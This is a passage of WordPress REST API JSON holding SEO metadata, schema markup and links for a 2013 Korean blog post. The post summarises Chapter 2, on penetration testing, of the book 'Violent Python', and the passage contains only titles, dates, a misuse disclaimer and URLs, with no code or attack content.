Apollo89.com\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/03\\\/VIOLENT_PYTHON_S.jpg\",\"datePublished\":\"2013-08-05T08:27:41+00:00\",\"dateModified\":\"2013-09-12T23:37:46+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#breadcrumb\"},\"inLanguage\":\"ko-KR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ko-KR\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#primaryimage\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/03\\\/VIOLENT_PYTHON_S.jpg\",\"contentUrl\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/wp-content\\\/uploads\\\/2013\\\/03\\\/VIOLENT_PYTHON_S.jpg\",\"width\":172,\"height\":220},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?p=3831#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\ud648\",\"item\":\"https:\\\/\\\/apollo89.com\\\/wordpress\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/\",\"name\":\"Apollo89.com\",\"description\":\"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ko-KR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/#\\\/schema\\\/person\\\/93f56825cac3b2f18e5f107995066c82\",\"name\":\"apollo89\",\"description\":\"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.\",\"url\":\"https:\\\/\\\/apollo89.com\\\/wordpress\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - Apollo89.com","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/apollo89.com\/wordpress\/?p=3831","og_locale":"ko_KR","og_type":"article","og_title":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - Apollo89.com","og_description":"&nbsp; Notice : \ud574\ub2f9 \uc790\ub8cc\uac00 \uc800\uc791\uad8c\ub4f1\uc5d0 \uc758\ud574\uc11c \ubb38\uc81c\uac00 \uc788\ub2e4\uba74 \ubc14\ub85c \uc0ad\uc81c\ud558\uaca0\uc2b5\ub2c8\ub2e4. \uc5f0\uad6c\ubaa9\uc801\uc73c\ub85c \uc0ac\uc6a9\ud558\uc9c0 \uc54a\uace0 \uc545\uc758\uc801\uc778 \ubaa9\uc801\uc73c\ub85c \uc774\uc6a9\ud560 \uacbd\uc6b0 \ubc1c\uc0dd\ud560 \uc218 \uc788\ub294 \ubc95\uc801\uc740 \ucc45\uc784\uc740 \ubaa8\ub450 \ubcf8\uc778\uc5d0\uac8c \uc788\uc2b5\ub2c8\ub2e4. [\uad6c\ub9e4\ud558\uae30] \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 1 \uc18c\uac1c \ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; &hellip; Continue reading &rarr;","og_url":"https:\/\/apollo89.com\/wordpress\/?p=3831","og_site_name":"Apollo89.com","article_published_time":"2013-08-05T08:27:41+00:00","article_modified_time":"2013-09-12T23:37:46+00:00","og_image":[{"url":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg","type":"","width":"","height":""}],"author":"apollo89","twitter_card":"summary_large_image","twitter_misc":{"\uae00\uc4f4\uc774":"apollo89","\uc608\uc0c1 \ub418\ub294 \ud310\ub3c5 \uc2dc\uac04":"7\ubd84"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#article","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831"},"author":{"name":"apollo89","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"headline":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4","datePublished":"2013-08-05T08:27:41+00:00","dateModified":"2013-09-12T23:37:46+00:00","mainEntityOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831"},"wordCount":56,"commentCount":4,"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg","keywords":["\uc2a4\ud130\ub514","\uce58\uba85\uc801\ud30c\uc774\uc36c"],"articleSection":["Python\/Ruby\/Perl","Reading"],"inLanguage":"ko-KR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/apollo89.com\/wordpress\/?p=3831#respond"]}]},{"@type":"WebPage","@id":"https:\/\/apollo89.com\/wordpress\/?p=3831","url":"https:\/\/apollo89.com\/wordpress\/?p=3831","name":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c - CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 - \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4 - Apollo89.com","isPartOf":{"@id":"https:\/\/apollo89.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#primaryimage"},"image":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#primaryimage"},"thumbnailUrl":"http:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg","datePublished":"2013-08-05T08:27:41+00:00","dateModified":"2013-09-12T23:37:46+00:00","author":{"@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82"},"breadcrumb":{"@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#breadcrumb"},"inLanguage":"ko-KR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/apollo89.com\/wordpress\/?p=3831"]}]},{"@type":"ImageObject","inLanguage":"ko-KR","@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#primaryimage","url":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg","contentUrl":"https:\/\/apollo89.com\/wordpress\/wp-content\/uploads\/2013\/03\/VIOLENT_PYTHON_S.jpg","width":172,"height":220},{"@type":"BreadcrumbList","@id":"https:\/\/apollo89.com\/wordpress\/?p=3831#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\ud648","item":"https:\/\/apollo89.com\/wordpress"},{"@type":"ListItem","position":2,"name":"\ud574\ucee4\uc758 \uc5b8\uc5b4, \uce58\uba85\uc801 \ud30c\uc774\uc36c &#8211; CHAPTER 2 \uce68\ud22c \ud14c\uc2a4\ud2b8 &#8211; \ucee8\ud53c\ucee4 \ub178\ub825\ud558\uba74 \ub41c\ub2e4"}]},{"@type":"WebSite","@id":"https:\/\/apollo89.com\/wordpress\/#website","url":"https:\/\/apollo89.com\/wordpress\/","name":"Apollo89.com","description":"\uc544\ud3f4\ub85c\uc528\uc758 \uc7a1\ub2e4\ud55c \uacbd\ud5d8\ub4e4..","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/apollo89.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ko-KR"},{"@type":"Person","@id":"https:\/\/apollo89.com\/wordpress\/#\/schema\/person\/93f56825cac3b2f18e5f107995066c82","name":"apollo89","description":"\uc544\ud3f4\ub85c89 \uc785\ub2c8\ub2e4.","url":"https:\/\/apollo89.com\/wordpress\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/3831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3831"}],"version-history":[{"count":0,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/3831\/revisions"}],"wp:attachment":[{"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/apollo89.com\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}